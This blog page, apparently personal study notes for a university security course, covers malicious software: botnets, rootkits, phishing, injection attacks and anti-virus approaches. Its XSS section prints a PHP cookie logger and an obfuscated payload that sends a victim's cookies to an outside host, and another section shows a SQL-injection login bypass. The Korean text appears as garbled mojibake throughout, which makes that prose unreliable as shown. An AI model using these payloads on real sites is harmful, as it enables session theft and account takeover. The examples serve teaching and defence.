• Mindscape ๐Ÿ”ฅ
    • Playlist ๐ŸŽง
  • Algorithm

    • 1018๋ฒˆ: ์ฒด์ŠคํŒ ๋‹ค์‹œ ์น ํ•˜๊ธฐ
    • 1966๋ฒˆ: ํ”„๋ฆฐํ„ฐ ํ
    • Python ์‹œ๊ฐ„ ์ดˆ๊ณผ ๋ฐฉ์ง€๋ฅผ ์œ„ํ•œ ํŒ
    • C++ std::vector ์‚ฌ์šฉ๋ฒ• ์ •๋ฆฌ
    • Vim ์‚ฌ์šฉ ๋งค๋‰ด์–ผ
  • Ubuntu

    • ๋ฆฌ๋ˆ…์Šค ์šฐ๋ถ„ํˆฌ GRUB ํฐํŠธ ๋ณ€๊ฒฝ
    • ์šฐ๋ถ„ํˆฌ ์ด๋ฏธ์ง€ ๋น„๋””์˜ค ์ธ๋„ค์ผ(๋ฏธ๋ฆฌ๋ณด๊ธฐ) ์•ˆ ๋ณด์ž„ ๋ฌธ์ œ ํ•ด๊ฒฐ
    • Wine ํ™˜๊ฒฝ์—์„œ ์นด์นด์˜คํ†ก ์‹คํ–‰ ์‹œ explorer.exe ๋œจ์ง€ ์•Š๊ฒŒ ํ•˜๋Š” ๋ฒ•
    • ์šฐ๋ถ„ํˆฌ Wine ์นด์นด์˜คํ†ก ์‚ฌ์ง„ ์ด๋ฏธ์ง€ ์Šคํฌ๋ฆฐ์ƒท ๋ถ™์—ฌ๋„ฃ๊ธฐ
    • Wine ์นด์นด์˜คํ†ก ์ด๋ชจ์ง€ ๊นจ์ง ๋ฌธ์ œ ํ•ด๊ฒฐ
    • Ubuntu ์œˆ๋„์šฐ ์• ๋‹ˆ๋ฉ”์ด์…˜ ๋„๊ธฐ
  • Wellness

    • ์ฐจ์ „์žํ”ผ (Psyllium Husk)
    • ์—‘์ŠคํŠธ๋ผ ๋ฒ„์ง„ ์˜ฌ๋ฆฌ๋ธŒ์œ  (Extra Virgin Olive Oil)
    • ์ž๊ฐ€๋น„๊ฐ•์„ธ์ฒ™ (Nasal Irrigation)
    • QCY HT08 (MeloBuds Pro Plus)
    • ์ฝ˜์„œํƒ€ (Concerta)
    • ์ธ๋ฐ๋†€ (Inderal)
    • ์„คํŠธ๋ž„๋ฆฐ (Sertraline)
    • ๋ฉœ๋ผํ† ๋‹Œ (Melatonin)
    • ์น˜๊ฒฝ๋ถ€ ๋งˆ๋ชจ์ฆ
    • ๋ฐ”๋ฒจ ์Šค์ฟผํŠธ (Barbell Squat)
  • Humanities

    • Nordvik, Russia
    • North Sentinel Island
    • ๋กฑ๊ณ ๋กฑ๊ณ (Rongorongo)
    • ๋ฐ”๋กœํฌ ์Œ์•… (Baroque Music)
  • Design

    • ๊ตฌ๊ธ€์˜ ์•„์ด์ฝ˜ ๋Œ€๊ฐœํŽธ โ€” 6๋…„ ๋งŒ์˜ ์‹ค์ˆ˜ ์ธ์ •
    • ์ œ๋Ÿด๋“œ ์  ํƒ€ โ€” ๋Ÿญ์…”๋ฆฌ ์Šคํฌ์ธ  ์›Œ์น˜์˜ ์ฐฝ์‹œ์ž
    • ๋ฐ”์šฐํ•˜์šฐ์Šค โ€” ํ˜„๋Œ€ ๋””์ž์ธ์˜ ์›์ 
  • Brands

    • NOMOS Glashรผtte
    • Frรฉdรฉrique Constant
    • KZ (Knowledge Zenith)
    • ์—์ŠคํŠธ๋ผ (AESTURA)
    • JINHAO (้‡‘่ฑช)
    • Herman Miller
    • ๋ฐ์Šค์ปค (DESKER)
    • ๋ฌด์‹ ์‚ฌ ์Šคํƒ ๋‹ค๋“œ (Musinsa Standard)
  • Finance

    • ํ˜„๋Œ€์นด๋“œ ZERO โ€” Edition2 vs Edition3 ๋น„๊ต
    • ์‹ ํ•œ์นด๋“œ ์ฒ˜์Œ
    • S&P 500 ETF ํˆฌ์ž ๊ฐ€์ด๋“œ
    • ํŒŒํ‚นํ†ต์žฅ vs CMA ํ†ต์žฅ
    • ๋ฒ„ํฌ์…” ํ•ด์„œ์›จ์ด (Berkshire Hathaway)
    • ๋น„ํŠธ์ฝ”์ธ(Bitcoin)
  • Products

    • ์˜ค๋””์˜ค ์ธํ„ฐํŽ˜์ด์Šค (Audio Interface)
    • ์ฟ ๋ฃจํ† ๊ฐ€ (KURUTOGA)
    • CX31993 DAC ๋™๊ธ€
    • ํด๋ Œ์ง• ๋ฐ€ํฌ (Cleansing Milk)
    • ํ”ผ์ ฏ ํ† ์ด (Fidget Toy)
    • ThinkPad
  • Programming Languages

    • 8.0. Statement Level Control Structures
    • 8. Subprogram
    • 9. Implementing Subprogram
    • 10.1. Abstract Data Types and Encapsulation Constructs
    • 10.2. Support for Object Oriented Programming
    • 11. Concurrency
    • 12. FPL (1)
    • 13. FPL (2)
    • 14. Exception Handling and Event Handling
    • Final Exam

07. Malicious Software

์ž‘์„ฑ 2026. 6. 12.ยท์ˆ˜์ • 2026. 6. 12.

Botnet Overview

  • botmaster
    • ๋‹ค์–‘ํ•œ malware๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ botnet ๊ตฌ์ถ•
    • ์•…์˜์ ์ธ ํ™œ๋™์„ ์œ„ํ•œ ๋ช…๋ น ์ „์†ก
  • bot
    • Bot master๊ฐ€ ์‚ฌ์šฉํ•˜๋Š” ์•…์„ฑ ์ฝ”๋“œ
    • ์ทจ์•ฝํ•œ ๊ฐœ์ธ PC ๋˜๋Š” ๊ธฐํƒ€ device ๊ฐ์—ผ
    • Bot master์˜ ๋ช…๋ น์— ๊ธฐ๋ฐ˜ํ•˜์—ฌ ์•…์˜์ ์ธ ํ™œ๋™ ์ˆ˜ํ–‰
  • botnet
    • ๋‹ค์ˆ˜์˜ bot๊ณผ ํ•˜๋‚˜ ์ด์ƒ์˜ bot master๋กœ ๊ตฌ์„ฑ๋œ network
  • C&C (Command & Control) servers
    • Bot๋“ค์—๊ฒŒ ๋ช…๋ น์„ ์ค‘๊ณ„(relay)ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” server
    • Bot master๋ฅผ ์ถ”์ ํ•˜๊ธฐ ์–ด๋ ต๊ฒŒ ๋งŒ๋“ฆ

BotNet โ€“ Infection Path

  • ๋ธŒ๋ผ์šฐ์ € ์ทจ์•ฝ์ : 65%
  • ์ด๋ฉ”์ผ ์ฒจ๋ถ€ ํŒŒ์ผ: 13%
  • OS ์ทจ์•ฝ์ : 11%
  • ๋‹ค์šด๋กœ๋“œ๋œ ํŒŒ์ผ: 9%
  • ๊ธฐํƒ€: 2%

Countermeasures against botnets

  • BotNet์˜ ๋ฐฉ์–ด๊ฐ€ ์–ด๋ ค์šด ์ด์œ 
    • ํƒ์ง€์˜ ์–ด๋ ค์›€
    • ๋‹ค์ค‘ ํŠน์ง•
      • Worm/virus, backdoor, spyware, rootkit ๋“ฑ์˜ ๋‹ค์–‘ํ•œ ๊ธฐ๋Šฅ ๋ณด์œ 
    • ๋งŽ์€ ๋ณ€์ข…
    • ์ผ๋ฐ˜ ์‚ฌ์šฉ์ž PC์˜ bot ๊ฐ์—ผ
    • ์ •์ƒ IP address ์‚ฌ์šฉ (Spoofed IP address ์•„๋‹˜)
    • ์†Œ์ˆ˜์˜ attack packet ์ƒ์„ฑ
    • ๋Œ€๋ถ€๋ถ„์˜ ์‹œ๊ฐ„ ๋™์•ˆ ์•…์„ฑ ํ–‰์œ„ ์—†์Œ

Botnet composition and operations

  1. ์ทจ์•ฝ์ , email ๋“ฑ์„ ํ†ตํ•œ malware ์ „ํŒŒ
  2. C&C server ์ ‘์†
  3. ๋ช…๋ น/์ œ์–ด
  4. ๋ช…๋ น/์ œ์–ด
  5. ์•…์„ฑ ํ–‰์œ„ ์ˆ˜ํ–‰ (DDoS, spam email ๋“ฑ)
  • C&C server
  • Botnet
  • Botmaster
  • Victim

BotNet composition

  • Network protocol
    • IRC (Internet Relay Chatting)
    • Http
    • P2P
    • โ€ฆ
  • Bot master๊ฐ€ C&C(Command & Control) server๋ฅผ ํ†ตํ•ด ๋ช…๋ น/์ œ์–ด ์ „์†ก
  • C&C server ๊ตฌ์ถ• ๋ฐฉ๋ฒ•
  • ๊ฒฝ์ฐฐ์— ์˜ํ•ด C&C server๊ฐ€ ํ์‡„๋  ๊ฒฝ์šฐ์˜ ๋Œ€์ฒ˜

Rally Mechanism

  • Hard-coded IP address vs Dynamic DNS (DDNS)
  • Hard-coded IP address ์‚ฌ์šฉ
    1. x.x.x.x ์—ฐ๊ฒฐ
  • DNS
    • C&C : x.x.x.x
    • C&C : a.net

CCTV bots

Remote Control Facility

  • Bot๊ณผ worm์˜ ๊ตฌ๋ณ„
    • Worm์€ ์Šค์Šค๋กœ ์ „ํŒŒ ๋ฐ ํ™œ์„ฑํ™”
    • Bot์€ ์ดˆ๊ธฐ์— ์ค‘์•™ ์‹œ์„ค๋กœ๋ถ€ํ„ฐ ์ œ์–ด๋จ
  • Remote control facility ๊ตฌํ˜„์˜ ์ผ๋ฐ˜์ ์ธ ์ˆ˜๋‹จ์€ IRC server
    • Bot์ด ์„œ๋ฒ„์˜ ํŠน์ • ์ฑ„๋„์— ์ฐธ์—ฌํ•˜์—ฌ ์ˆ˜์‹  ๋ฉ”์‹œ์ง€๋ฅผ ๋ช…๋ น์œผ๋กœ ์ฒ˜๋ฆฌ
  • ์ตœ์‹  botnet์€ HTTP์™€ ๊ฐ™์€ protocol์„ ํ†ตํ•œ ์€๋ฐ€ํ•œ ํ†ต์‹  ์ฑ„๋„ ์‚ฌ์šฉ
  • ๋ถ„์‚ฐ ์ œ์–ด ๋ฉ”์ปค๋‹ˆ์ฆ˜์€ ๋‹จ์ผ ์‹คํŒจ ์ง€์ ์„ ํ”ผํ•˜๊ธฐ ์œ„ํ•ด peer-to-peer protocol ์‚ฌ์šฉ

Keylogger ๋ฐ spyware

  • Keylogger
    • ๊ณต๊ฒฉ์ž๊ฐ€ ๋ฏผ๊ฐ ์ •๋ณด๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•  ์ˆ˜ ์žˆ๋„๋ก keystroke ์บก์ฒ˜
    • ์ผ๋ฐ˜์ ์œผ๋กœ keyword(โ€œloginโ€, โ€œpasswordโ€) ์ฃผ๋ณ€ ์ •๋ณด๋งŒ ๋ฐ˜ํ™˜ํ•˜๋Š” ํ•„ํ„ฐ๋ง ๋ฉ”์ปค๋‹ˆ์ฆ˜ ์‚ฌ์šฉ
  • Spyware
    • ์‹œ์Šคํ…œ์˜ ๊ด‘๋ฒ”์œ„ํ•œ ํ™œ๋™์„ ๋ชจ๋‹ˆํ„ฐ๋งํ•˜๊ธฐ ์œ„ํ•ด ์นจํ•ด๋œ ๋จธ์‹ ์„ ์žฅ์•…
    • Browsing ํ™œ๋™์˜ ๊ธฐ๋ก ๋ฐ ์ฝ˜ํ…์ธ  ๋ชจ๋‹ˆํ„ฐ๋ง
    • ํŠน์ • web page ์š”์ฒญ์„ ๊ฐ€์งœ ์‚ฌ์ดํŠธ๋กœ redirection
    • Browser์™€ ํŠน์ • ๊ด€์‹ฌ web site ๊ฐ„ ๊ตํ™˜๋˜๋Š” ๋ฐ์ดํ„ฐ์˜ ๋™์  ์ˆ˜์ •

Phising

  • Spear-phishing
    • ๊ณต๊ฒฉ์ž๊ฐ€ ์ˆ˜์‹ ์ž๋ฅผ ๋ฉด๋ฐ€ํžˆ ์กฐ์‚ฌํ•จ.
    • ์ˆ˜์‹ ์ž์—๊ฒŒ ํŠน๋ณ„ํžˆ ๋งž์ถฐ์ง„ e-mail ์ œ์ž‘, ์ง„์œ„ ํ™•์‹ ์„ ์œ„ํ•ด ๋‹ค์–‘ํ•œ ์ •๋ณด ์ธ์šฉ
  • Phishing
    • ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ์†Œ์Šค์˜ ํ†ต์‹ ์œผ๋กœ ์œ„์žฅํ•˜์—ฌ ์‚ฌ์šฉ์ž์˜ ์‹ ๋ขฐ๋ฅผ ์ด์šฉํ•˜๋Š” social engineering ์•…์šฉ
    • ๋ฑ…ํ‚น, ๊ฒŒ์ž„ ๋“ฑ ์œ ์‚ฌ ์‚ฌ์ดํŠธ์˜ ๋กœ๊ทธ์ธ ํŽ˜์ด์ง€๋ฅผ ๋ชจ๋ฐฉํ•œ ๊ฐ€์งœ web site๋กœ ์—ฐ๊ฒฐ๋˜๋Š” URL์„ spam e-mail์— ํฌํ•จ
    • ๊ณ„์ • ์ธ์ฆ์„ ์œ„ํ•ด ์‚ฌ์šฉ์ž์˜ ๊ธด๊ธ‰ํ•œ ์กฐ์น˜๊ฐ€ ํ•„์š”ํ•จ์„ ์•”์‹œ
    • ์บก์ฒ˜๋œ ์ž๊ฒฉ ์ฆ๋ช…์„ ์‚ฌ์šฉํ•˜์—ฌ ๊ณต๊ฒฉ์ž๊ฐ€ ๊ณ„์ • ๋„์šฉ

Backdoor

  • Trapdoor๋ผ๊ณ ๋„ ํ•จ.
  • ๊ณต๊ฒฉ์ž๊ฐ€ ๋ณด์•ˆ ์ ‘๊ทผ ์ ˆ์ฐจ๋ฅผ ์šฐํšŒํ•˜์—ฌ ์ ‘๊ทผ ๊ถŒํ•œ์„ ์–ป์„ ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” ํ”„๋กœ๊ทธ๋žจ์˜ ๋น„๋ฐ€ ์ง„์ž…์ 
  • Maintenance hook์€ ํ”„๋กœ๊ทธ๋ž˜๋จธ๊ฐ€ ๋””๋ฒ„๊น… ๋ฐ ํ…Œ์ŠคํŠธ๋ฅผ ์œ„ํ•ด ์‚ฌ์šฉํ•˜๋Š” backdoor
  • ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ๋‚ด backdoor์— ๋Œ€ํ•œ ์šด์˜ ์ฒด์ œ ์ œ์–ด ๊ตฌํ˜„์˜ ์–ด๋ ค์›€

Rootkit

  • ์‹œ์Šคํ…œ์— ๋Œ€ํ•œ ์€๋ฐ€ํ•œ ์ ‘๊ทผ์„ ์œ ์ง€ํ•˜๊ธฐ ์œ„ํ•ด ์„ค์น˜๋œ ์ˆจ๊ฒจ์ง„ ํ”„๋กœ๊ทธ๋žจ ์ง‘ํ•ฉ
  • ์ปดํ“จํ„ฐ์˜ process, file, registry๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•˜๊ณ  ๋ณด๊ณ ํ•˜๋Š” ๋ฉ”์ปค๋‹ˆ์ฆ˜์„ ์กฐ์ž‘ํ•˜์—ฌ ์€ํ
  • ๊ณต๊ฒฉ์ž์—๊ฒŒ ๊ด€๋ฆฌ์ž(๋˜๋Š” root) ๊ถŒํ•œ ๋ถ€์—ฌ
  • ํ”„๋กœ๊ทธ๋žจ ๋ฐ ํŒŒ์ผ ์ถ”๊ฐ€/๋ณ€๊ฒฝ, process ๋ชจ๋‹ˆํ„ฐ๋ง, network traffic ์†ก์ˆ˜์‹ , ํ•„์š” ์‹œ backdoor ์ ‘๊ทผ ๊ฐ€๋Šฅ

Rootkit Classification Characteristics

  • Persistent
  • Memory based
  • User mode
  • Kernel mode
  • Virtual machine based
  • External mode

System Call Table Modification

HW based Rootkit detection

  • System bus monitor๋ฅผ ์‚ฌ์šฉํ•œ kernel ๋ฌด๊ฒฐ์„ฑ ๋ชจ๋‹ˆํ„ฐ๋ง

Phishing

  • Voice phishing
  • Messenger phishing
  • SMS phishing (Smishing)
  • Email phishing
  • Phishing site

Cold Boot Attacks

  • DRAM ๋‚ด encryption key์— ๋Œ€ํ•œ ๊ณต๊ฒฉ

dll injection

  • Dll : dynamic link library
    • ์‹คํ–‰ ํŒŒ์ผ์—์„œ ํ•„์š”ํ•œ library๋ฅผ ๋™์ ์œผ๋กœ loadingํ•จ.
    • Linux์—์„œ๋Š” .so ํŒŒ์ผ
  • Dll injection ๊ณต๊ฒฉ
    • ๊ณต๊ฒฉ์ž๊ฐ€ ์ œ์ž‘ํ•œ dll ํŒŒ์ผ์„ ์ •์ƒ ํŒŒ์ผ์ธ ๊ฒƒ์ฒ˜๋Ÿผ loadingํ•˜๋„๋ก ํ•˜๋Š” ๊ณต๊ฒฉ

Process Injection ๊ณต๊ฒฉ

  • In-memory malware ๋˜๋Š” fileless malware์—์„œ ์‚ฌ์šฉ๋˜๋Š” ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•
  • Process์˜ ๊ฐ€์ƒ ๋ฉ”๋ชจ๋ฆฌ ์‹คํ–‰ ์ฝ”๋“œ ๋ถ€๋ถ„์„ ๊ณต๊ฒฉ์ž์˜ ์ฝ”๋“œ๋กœ ๋ฐ”๊พธ์–ด ์‹คํ–‰ํ•˜๊ฒŒ ํ•˜๋Š” ๋ฐฉ๋ฒ•
  • ์˜ˆ: svchost.exe, dllhost.exe ๋“ฑ๊ณผ ๊ฐ™์€ process์˜ ์‹คํ–‰ ์ฝ”๋“œ ๋ถ€๋ถ„์„ ๊ณต๊ฒฉ์ž์˜ ์ฝ”๋“œ๋กœ ๋ณ€๊ฒฝ

Web Attacks โ€“ Cybercrime 2.0

  • Browser ๊ด€๋ จ ๊ณต๊ฒฉ
    • Browser ์„ฑ๋Šฅ ํ–ฅ์ƒ ๋ฐ web ๊ธฐ๋Šฅ ํ’๋ถ€ํ™”
    • Spam email์„ ํ†ตํ•ด ์‚ฌ์šฉ์ž ์œ ์ธ
  • Web server ๊ณต๊ฒฉ
    • Exploit server๋ฅผ ๊ฐ€๋ฆฌํ‚ค๋Š” IFRAME
    • โ€œDrive-by downloadโ€ : malware ์ „ํŒŒ์˜ ์ฃผ์š” ๊ฒฝ๋กœ๋กœ ์‚ฌ์šฉ๋จ
    • SQL injection ๊ณต๊ฒฉ
      • SELECT * FROM users WHERE username = โ€˜adminโ€™--โ€˜ and password = โ€˜1234โ€™
    • .htaccess๋ฅผ ํ†ตํ•œ redirection
      • URL์„ ๋‹ค๋ฅธ ๋ชฉ์ ์ง€๋กœ ์„ ํƒ์  redirection ํ—ˆ์šฉ (์˜ˆ: HTTP Referrer header ์ด์šฉ)

Web Attacks - Cross Site Scripting (XSS)

  • Web application ๋ณด์•ˆ์˜ ์ผ๋ฐ˜์ ์ธ ๋ฌธ์ œ
    • Server-side web application์˜ ๊ฒฐํ•จ์œผ๋กœ ๋ฐœ์ƒ (๊ณต๊ฒฉ์ž๊ฐ€ ์ž„์˜์˜ HTML ์‚ฝ์ž… ํ—ˆ์šฉ)
  • ์ทจ์•ฝํ•œ script ์‚ฝ์ž…
    • ์—‰๋šฑํ•œ ๋ฐ์ดํ„ฐ ์‚ฝ์ž… ๋˜๋Š” ๋‹ค๋ฅธ ์œ„์น˜๋กœ ์ด๋™
  • ์˜ˆ์‹œ
    <?php
    $f = fopen(โ€œlog.txtโ€,โ€aโ€);
    fwrite($f, โ€œIP: {$_SERVER[โ€˜REMOVE_ADDRโ€™]} Ref: {$_SERVER[โ€˜HTTP_REFERERโ€™]} Cookie
    {$HTTP_GET_VARS[โ€˜cookie_nameโ€™]\nโ€);
    fclose($f); ?>
    

Web Attacks - Cross Site Scripting (XSS)

<div id='test'></div>
<img src='์ด๋ฏธ์ง€ ์ฃผ์†Œ' onLoad='eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116,
46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 116, 101, 115, 116, 3
9, 41, 46, 105, 110, 110, 101, 114, 72, 84, 77, 76, 61, 34, 60, 105, 102, 114, 97, 109, 101, 32, 110,
97, 109, 101, 61, 92, 34, 104, 97, 99, 107, 95, 102, 114, 97, 109, 101, 92, 34, 32, 105, 100, 61, 92,
34, 104, 97, 99, 107, 95, 102, 114, 97, 109, 101, 92, 34, 32, 119, 105, 100, 116, 104, 61, 48, 32, 10
4, 101, 105, 103, 104, 116, 61, 48, 62, 60, 47, 105, 102, 114, 97, 109, 101, 62, 34, 59));'>
<img src='์ด๋ฏธ์ง€ ์ฃผ์†Œ' onLoad='eval(String.fromCharCode(104, 97, 99, 107, 95, 102, 114, 97, 109,
101, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 34, 104, 116, 116, 112, 5
8, 47, 47, 117, 115, 101, 99, 117, 114, 105, 116, 121, 46, 104, 97, 110, 121, 97, 110, 103, 46, 97, 9
9, 46, 107, 114, 47, 97, 46, 112, 104, 112, 63, 98, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116,
46, 99, 111, 111, 107, 105, 101, 59));'>

โ†“โ†“ โ†“

<div id="test"></div>
<img src= ..... document.getElementById('test').innerHTML="<iframe name=\"hack_frame\" id=\"
hack_frame\" width=0 height=0></iframe>"; ...>
<img src= ..... hack_frame.location.href='http://usecurity.hanyang.ac.kr/a.php?b=' +document.cookie
; ...>

OWASP TOP 10 (2021)

  1. ์ ‘๊ทผ ์ œ์–ด ์ทจ์•ฝ์  (Broken Access Control)
  2. ์•”ํ˜ธํ™” ์‹คํŒจ (Cryptographic Failures)
  3. ์ธ์ ์…˜ (Injection)
  4. ์•ˆ์ „ํ•˜์ง€ ์•Š์€ ์„ค๊ณ„ (Insecure Design)
  5. ๋ณด์•ˆ ์„ค์ • ์˜ค๋ฅ˜ (Security Misconfiguration)
  6. ์˜ค๋ž˜๋˜๊ณ  ์ทจ์•ฝํ•œ ๊ตฌ์„ฑ์š”์†Œ ์‚ฌ์šฉ (Vulnerable and Outdated Components)
  7. ์‹๋ณ„ ๋ฐ ์ธ์ฆ ์‹คํŒจ (Identification and Authentication Failures)
  8. ์†Œํ”„ํŠธ์›จ์–ด ๋ฐ ๋ฐ์ดํ„ฐ ๋ฌด๊ฒฐ์„ฑ ์‹คํŒจ (Software and Data Integrity Failures)
  9. ๋ณด์•ˆ ๋กœ๊น… ๋ฐ ๋ชจ๋‹ˆํ„ฐ๋ง ์‹คํŒจ (Security Logging and Monitoring Failures)
  10. ์„œ๋ฒ„ ์ธก ์š”์ฒญ ์œ„์กฐ (Server-Side Request Forgery, SSRF)

SNS

  • Twitter
    • 1์–ต 600๋งŒ ์‚ฌ์šฉ์ž
    • ์›” 10์–ต tweet
  • Twitter ์ƒ์˜ spam
    • Spamming์„ ์œ„ํ•ด ์นจํ•ด๋œ ๊ณ„์ •
    • ์„ฑ๊ณต ์š”์ธ
      • ๋Œ€๊ทœ๋ชจ ์‚ฌ์šฉ์ž
      • URL ๋‹จ์ถ• ์„œ๋น„์Šค
      • ๋ฐฉ์ง€๋ฅผ ์œ„ํ•œ ํ•„ํ„ฐ๋ง ๋ฉ”์ปค๋‹ˆ์ฆ˜ ๋ถ€์žฌ

Spam Classification

  • Clickthrough rate (CTR)
    • ์ด 245,000 URL
    • 97.7%์˜ URL์€ click ์—†์Œ
    • Traffic์„ ๋ฐœ์ƒ์‹œํ‚ค๋Š” link ์ค‘ (URL์˜ 2.3%)
      • URL์˜ 50%๋Š” 10ํšŒ ๋ฏธ๋งŒ click
      • ์ƒ์œ„ 10% URL์ด 160๋งŒ click ํš๋“
    • Spam tweet์˜ 0.13%๊ฐ€ ๋ฐฉ๋ฌธ ๋ฐœ์ƒ์‹œํ‚ด
      • Spam email์˜ CTR(0.003%-0.006%)๋ณด๋‹ค ํ›จ์”ฌ ๋†’์Œ

Malware Countermeasure Approaches

  • Malware ์œ„ํ˜‘์— ๋Œ€ํ•œ ์ด์ƒ์ ์ธ ํ•ด๊ฒฐ์ฑ…์€ ์˜ˆ๋ฐฉ
    • ์˜ˆ๋ฐฉ์˜ 4๊ฐ€์ง€ ์ฃผ์š” ์š”์†Œ
      • ์ •์ฑ…
      • ์ธ์‹
      • ์ทจ์•ฝ์  ์™„ํ™”
      • ์œ„ํ˜‘ ์™„ํ™”
  • ์˜ˆ๋ฐฉ ์‹คํŒจ ์‹œ, ๋‹ค์Œ ์œ„ํ˜‘ ์™„ํ™” ์˜ต์…˜์„ ์ง€์›ํ•˜๊ธฐ ์œ„ํ•ด ๊ธฐ์ˆ ์  ๋ฉ”์ปค๋‹ˆ์ฆ˜ ์‚ฌ์šฉ ๊ฐ€๋Šฅ
    • ํƒ์ง€
    • ์‹๋ณ„
    • ์ œ๊ฑฐ

Generations of Anti-Virus Software

  • 1์„ธ๋Œ€: ๋‹จ์ˆœ ์Šค์บ๋„ˆ
    • ์•…์„ฑ ์†Œํ”„ํŠธ์›จ์–ด๋ฅผ ์‹๋ณ„ํ•˜๊ธฐ ์œ„ํ•ด ์‹œ๊ทธ๋‹ˆ์ฒ˜๊ฐ€ ํ•„์š”
    • ์•Œ๋ ค์ง„ ์•…์„ฑ ์†Œํ”„ํŠธ์›จ์–ด์˜ ํƒ์ง€์— ๊ตญํ•œ๋จ.
  • 2์„ธ๋Œ€: ํœด๋ฆฌ์Šคํ‹ฑ ์Šค์บ๋„ˆ
    • ํœด๋ฆฌ์Šคํ‹ฑ ๊ทœ์น™์„ ์‚ฌ์šฉํ•˜์—ฌ ์˜์‹ฌ์Šค๋Ÿฌ์šด ์•…์„ฑ ์†Œํ”„ํŠธ์›จ์–ด ์ธ์Šคํ„ด์Šค๋ฅผ ๊ฒ€์ƒ‰
    • ๋‹ค๋ฅธ ์ ‘๊ทผ ๋ฐฉ์‹์€ ๋ฌด๊ฒฐ์„ฑ ๊ฒ€์‚ฌ
  • 3์„ธ๋Œ€: ํ–‰์œ„ ๊ธฐ๋ฐ˜ ํƒ์ง€
    • ๊ฐ์—ผ๋œ ํ”„๋กœ๊ทธ๋žจ์˜ ๊ตฌ์กฐ๊ฐ€ ์•„๋‹Œ ํ–‰๋™์œผ๋กœ ์•…์„ฑ ์†Œํ”„ํŠธ์›จ์–ด๋ฅผ ์‹๋ณ„ํ•˜๋Š” ๋ฉ”๋ชจ๋ฆฌ ์ƒ์ฃผ ํ”„๋กœ๊ทธ๋žจ
  • 4์„ธ๋Œ€: ์ข…ํ•ฉ ๋ณดํ˜ธ
    • ๋‹ค์–‘ํ•œ anti-virus ๊ธฐ์ˆ ์„ ํ•จ๊ป˜ ์‚ฌ์šฉํ•˜๋Š” ํŒจํ‚ค์ง€
    • ์Šค์บ๋‹, ํ–‰์œ„ ๊ธฐ๋ฐ˜ ํƒ์ง€, ์ ‘๊ทผ ์ œ์–ด ๊ธฐ๋Šฅ ํฌํ•จ

Generic Decryption (GD)

  • Anti-virus ํ”„๋กœ๊ทธ๋žจ์ด ๋น ๋ฅธ scanning ์†๋„๋ฅผ ์œ ์ง€ํ•˜๋ฉด์„œ ๋ณต์žกํ•œ polymorphic virus ๋ฐ ๊ธฐํƒ€ malware๋ฅผ ์‰ฝ๊ฒŒ ํƒ์ง€ ๊ฐ€๋Šฅ
  • ์‹คํ–‰ ํŒŒ์ผ์€ ๋‹ค์Œ ์š”์†Œ๋ฅผ ํฌํ•จํ•˜๋Š” GD scanner๋ฅผ ํ†ตํ•ด ์‹คํ–‰๋จ
    • CPU emulator
    • Virus signature scanner
    • Emulation control module
  • GD scanner์˜ ๊ฐ€์žฅ ์–ด๋ ค์šด ์„ค๊ณ„ ๋ฌธ์ œ๋Š” ๊ฐ ํ•ด์„์„ ์–ผ๋งˆ๋‚˜ ์˜ค๋ž˜ ์‹คํ–‰ํ• ์ง€ ๊ฒฐ์ •ํ•˜๋Š” ๊ฒƒ์ž„.

Host-Based Behavior-Blocking Software

  • Host ์ปดํ“จํ„ฐ์˜ OS์™€ ํ†ตํ•ฉ๋˜์–ด ์•…์„ฑ ํ–‰์œ„์— ๋Œ€ํ•ด ํ”„๋กœ๊ทธ๋žจ ๋™์ž‘์„ ์‹ค์‹œ๊ฐ„ ๋ชจ๋‹ˆํ„ฐ๋ง
  • ์‹œ์Šคํ…œ์— ์˜ํ–ฅ์„ ๋ฏธ์น˜๊ธฐ ์ „์— ์ž ์žฌ์  ์•…์„ฑ ํ–‰์œ„ ์ฐจ๋‹จ
  • ์‹ค์‹œ๊ฐ„์œผ๋กœ ์†Œํ”„ํŠธ์›จ์–ด๋ฅผ ์ฐจ๋‹จํ•˜๋ฏ€๋กœ fingerprinting์ด๋‚˜ heuristic๊ณผ ๊ฐ™์€ anti-virus ํƒ์ง€ ๊ธฐ์ˆ ๋ณด๋‹ค ์ด์  ๋ณด์œ 
  • ํ•œ๊ณ„
    • ๋ชจ๋“  ๋™์ž‘์ด ์‹๋ณ„๋˜๊ธฐ ์ „์— ์•…์„ฑ ์ฝ”๋“œ๊ฐ€ ๋Œ€์ƒ ๋จธ์‹ ์—์„œ ์‹คํ–‰๋˜์–ด์•ผ ํ•˜๋ฏ€๋กœ, ํƒ์ง€ ๋ฐ ์ฐจ๋‹จ ์ „์— ํ•ด๋ฅผ ๋ผ์น  ์ˆ˜ ์žˆ์Œ

Perimeter Scanning Approaches

  • ์กฐ์ง์˜ firewall ๋ฐ IDS์—์„œ ์‹คํ–‰๋˜๋Š” email ๋ฐ web proxy ์„œ๋น„์Šค์— ์ผ๋ฐ˜์ ์œผ๋กœ anti-virus ์†Œํ”„ํŠธ์›จ์–ด ํฌํ•จ
  • IDS์˜ traffic ๋ถ„์„ ๊ตฌ์„ฑ ์š”์†Œ์—๋„ ํฌํ•จ๋  ์ˆ˜ ์žˆ์Œ
  • ์˜์‹ฌ์Šค๋Ÿฌ์šด traffic ํ๋ฆ„์„ ์ฐจ๋‹จํ•˜๋Š” ์นจ์ž… ๋ฐฉ์ง€ ์กฐ์น˜ ํฌํ•จ ๊ฐ€๋Šฅ
  • Malware scanning์œผ๋กœ ์ ‘๊ทผ ์ œํ•œ
  • Two types of monitoring software
    • Ingress monitor
      • ๊ธฐ์—… network์™€ internet ๊ฒฝ๊ณ„์— ์œ„์น˜
